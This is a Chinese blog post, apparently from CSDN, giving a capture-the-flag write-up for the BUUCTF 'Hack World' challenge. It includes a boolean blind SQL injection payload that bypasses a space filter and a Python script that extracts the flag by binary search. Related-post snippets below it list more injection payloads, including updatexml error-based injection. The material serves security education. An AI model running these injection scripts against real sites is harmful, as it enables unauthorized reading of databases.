BUUCTF[CISCN2019 华北赛区 Day2 Web1]Hack World(报错注入)

最新推荐文章于 2024-04-22 11:22:22 发布
最新推荐文章于 2024-04-22 11:22:22 发布
阅读量2.1k 收藏 1
点赞数 1
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104823905
版权

这道题过滤了常用的语句,还过滤了空格和/**/,一番分析之下发现果然我这种菜鸡只能看wp了。

然后学会了一种新的思路

0^(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'))

脚本:

import requests
import time
url='http://76eeac1c-8521-4f23-83f5-9e41b5f7b2d4.node3.buuoj.cn'
result=''

for x in range(1,50):
    high=127
    low=32
    mid=(high+low)//2
    while high>low:
        payload="0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(x,mid)
        data={"id":payload}
        html=requests.post(url,data=data).text
        #time.sleep(0.5)
        if "Hello" in html:
            low=mid+1
        else:
            high=mid
        mid=(low+high)//2
    result+=chr(int(mid))
    print(result)
print("flag:",result)

在这里插入图片描述

天问_Herbert555
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
国赛 2019 华北赛区 Web 题目
05-19
ciscn
利用PHAR协议进行PHP反序列化攻击1
08-03
在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化漏洞来实现文件读取或执行其他操作。例如,通过上传一个伪装成图片的PHAR文件,然后更改其后缀,使得PHP尝试解析它。...
BUUCTF——Hack World
weixin_45864041的博客
12-03 1262
题目告诉我们表名为flag,列名为flag 所以值查询为select flag from flag 按照提示传入id=0 传入id=1 什么都不传 现在看来应该是布尔型盲注,而且过滤了一些东西 尝试传入1^1 传入1^0 直接构造payload 1^(ascii(substr((select flag from flag),0,1))=102) 传入后可以发现,空格被过滤了 所以换一下 1^(ascii(substr((select(flag)from(flag)),0,1))=102) .
CTF-webbuuctf-[CISCN2019 华北赛区 Day2 Web1]Hack World(sql盲注)
Sankkl1的博客
08-18 430
根据上图可知,页面中已经告诉我们要从flag表中的flag列取出flag,思考是sql注入。经过抓包发现发post包中的id字段是注入点。同时还发现是盲注,即当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果。由此可以通过if函数来测试flag每一位的值,以下为编写的测试脚本。经测试当输入id=1时,结果为。,发现过滤了空格、#等符号。,当id=2时,结果为。
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
最新发布
m_de_g的博客
04-22 642
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF [web专项32][CISCN2019 华北赛区 Day2 Web1]Hack World
yanglinchiji的博客
11-13 101
发现一般注入和报错注入都不行。扫完即可获得flag。
buuctf-Fakebook(报错注入
m0_62094846的博客
04-04 2392
blog要有http:// 可以尝试sql注入,但是我用sqlmap注入不了,不知道为什么 然后尝试手工,试过很多闭合方式都不行,后来发现直接就是整型注入 正确的情况不会有回显,错误会有,试试报错注入 这里有个之前没见过的过滤方式,过滤了0x7e,要用~(本来以为过滤了updatexml,想用另一个来着) 查当前数据库 ?no=1 and updatexml(1,concat('~',(database()),'~'),1)# 查所有数据库 ?no=1 and...
BUUCTF web SQL注入篇
m0_55854679的博客
08-09 2804
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3998
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
BUUCTFWeb】随便注(SQL注入)
qq_70434663的博客
03-02 536
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL注入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL注入。第一步,测试注入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
BUUCTF WEB Hack World1
qq_41696858的博客
10-19 2020
经典脚本爆破 打开场景,发现一个输入框,提示要输入数字,鉴于题目上有明确提示,sql注入 那么我们先试试,输入纯数字 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do you want to be my girlfriend? 输入大于2的数回显:Error Occured When Fetch Result. 目测是由数字判断回显类型,且有不同回显,就怕不回显呢,那么考虑bool盲注 下
BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World
aoao331198的博客
04-11 741
明确告诉了flag的位置 输入1 输入其他的基本上都没有错误回显或者信息,采用bool盲注 fuzz一波发现select没有过滤,空格过滤了 1^(ascii(substr((select(flag)from(flag)),1,1))>127) 正常回显,说明方法可行 脚本跑出每一个字符即可 import requests import time url='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..
BUUCTF SSTI模板注入小结(持续更新)
CN天狼
05-02 1290
BUUCTF部分SSTI模板注入小结 [护网杯 2018]easy_tornado [BJDCTF2020]The mystery of ip [BJDCTF2020]Cookie is so stable [CISCN2019 华东南赛区]Web11 [WesternCTF2018]shrine [GYCTF2020]FlaskApp [CSCCTF 2019 Qual]FlaskLight
BUUCTF WEB [CISCN2019 华北赛区 Day2 Web1]Hack World
A_dmin的博客
12-14 2747
BUUCTF WEB [CISCN2019 华北赛区 Day2 Web1]Hack World 打开题目,看提示貌似是一个sql注入的题目~~ 进行简单测试,貌似不是报错注入,直接进行盲注测试,构造一波!! 抓包构造:id=1=(1)=1与id=1=(0)=1显示是不一样的: 我们可以根据页面显示来进行注入!!fuzz一波,看看过滤了啥! 482都是被过滤了的: ok,ascii没有被过...
[CISCN2019 华北赛区 Day2 Web1]Hack World
pakho_C的博客
02-12 1814
web第31题 [CISCN2019 华北赛区 Day2 Web1]Hack World 打开靶场: 提示了flag表中有flag列,我们只能提交id 提交1 地址栏中无参数,说明是post方式传参 提交2 3以及后面的就没有了,说明只有2条数据 尝试1’ 说明类型是数字 手动测试一下有无过滤,试了常规的猜解字段等方式,发现有过滤 FUZZ跑一下 相应为482的都是被过滤的字符 例如空格,or,order,union以及报错注入的相关字符都被过滤了 但是select和from没有被过滤 这时我
buuctf_[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_43952190的博客
07-02 827
Hack World 进入后提示是sql注入,并且给了表和列名。 进行fuzz测试,过滤了很多字符。 主要的union字符被过滤,但select,from没有被过滤。 我们还发现id只有输入1,2时分别返回Hello, glzjin wants a girlfriend.,Do you want to be my girlfriend?。并且支持异或判断。 所以可以进行布尔盲注读取数据。 id=0^(ascii(substr((select(flag)from(flag)),1,1))&gt
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
我们可以尝试一些常见的Web漏洞,比如SQL注入、XSS等。在这个题目中,我们可以尝试一些文件上传漏洞。 我们可以通过Burp Suite等工具,来拦截网站的上传请求,然后修改上传的文件,来获取flag。 具体的操作步骤...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值